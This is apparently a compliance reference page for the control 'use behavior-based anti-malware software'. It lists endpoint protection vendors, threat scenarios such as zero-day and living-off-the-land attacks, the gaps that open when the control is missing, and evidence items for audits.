Use Behavior>Based Anti>Malware Software
Description
Use behavior-based anti-malware software.
Implementation Checklist
Tool Recommendations
Cloud-native endpoint protection platform with next-gen AV, EDR, threat intelligence, and managed hunting
CrowdStrike · Per-endpoint subscription
Enterprise endpoint security with threat prevention, EDR, automated investigation, and attack surface reduction
Microsoft · Per-device subscription (P1/P2)
AI-powered endpoint protection with autonomous response, EDR, and XDR capabilities across endpoint, cloud, and identity
SentinelOne · Per-endpoint subscription
Extended detection and response platform correlating endpoint, network, cloud, and identity data for threat detection
Palo Alto Networks · Per-endpoint subscription
Threats & Vulnerabilities (CIS RAM)
Threat Scenarios
Zero-Day Malware Evading Signature-Based Detection
ConfidentialityNovel malware with no existing signatures bypasses traditional signature-based anti-malware completely, and without behavior-based detection the malicious activity (file encryption, credential access, lateral movement) executes unchallenged.
Polymorphic Malware Defeating Static Analysis
IntegrityMalware that changes its code signature with each execution evades signature-based detection engines, requiring behavioral analysis to identify the malicious actions (process injection, persistence mechanisms, C2 communication) rather than static file characteristics.
Living-Off-the-Land Techniques Invisible to Signature Scanning
ConfidentialityAttackers use legitimate operating system tools and processes (PowerShell, WMI, certutil, mshta) to execute malicious actions that signature-based solutions cannot detect because the tools themselves are legitimate, requiring behavioral analysis to identify abuse.
Vulnerabilities (When Safeguard Absent)
Anti-Malware Relies Solely on Signature-Based Detection
The organization's anti-malware solution uses only static signature matching without behavioral analysis, heuristics, or machine learning capabilities, making it blind to zero-day threats, polymorphic malware, and fileless attack techniques.
No EDR or Next-Generation Endpoint Protection
The organization has not deployed endpoint detection and response (EDR) or next-generation antivirus (NGAV) solutions that monitor process behavior, API calls, and system interactions to detect malicious activity patterns regardless of file signatures.
Evidence Requirements
| Type | Evidence Item | Collection Frequency |
|---|---|---|
| Technical | Detection tool deployment evidence (dashboard screenshots, agent status) | Captured monthly |
| Technical | Sample alert/detection output demonstrating capability | Captured quarterly |
| Technical | Anti-malware deployment status and detection statistics | Monthly |
| Document | Governing policy document (current, approved, communicated) | Reviewed annually |